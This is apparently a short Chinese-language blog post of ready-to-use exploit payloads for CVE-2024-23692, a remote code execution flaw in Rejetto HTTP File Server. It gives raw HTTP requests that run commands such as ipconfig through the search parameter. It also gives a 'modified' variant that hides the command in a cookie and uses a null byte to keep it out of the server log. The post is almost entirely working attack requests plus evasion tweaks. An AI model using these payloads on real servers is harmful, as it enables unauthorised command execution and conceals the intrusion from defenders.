[CVE-2024-23692] (HFS) Rejetto HTTP File Server RC...
目前主流POC主要有两种
1. 无回显
GET /?search=%25V%25url%25:%host%}{.exec|winver.}{.break.} HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Host: Connection: close2. 有回显
GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0 Connection: close
使用%00截断回显日志:
简化魔改,使用自带参数和Cookie来隐藏执行
GET /?sort=%0a%00&search=%25V%25url%25:%host%}{.exec|{.?a.}{.cookie|HFS_SID_.}|out=res.}{.^res.} HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Host: Cookie: HFS_SID_=%77%68%6f%61%6d%69 Connection: close
CM部落 》原创,转载请保留文章出处。
本文链接:[CVE-2024-23692] (HFS) Rejetto HTTP File Server RCE Payload魔改 https://www.itkz.cn/note/145.html
版权声明:若无特殊注明,本文皆为《
正文到此结束
发表吐槽
你肿么看?
既然没有吐槽,那就赶紧抢沙发吧!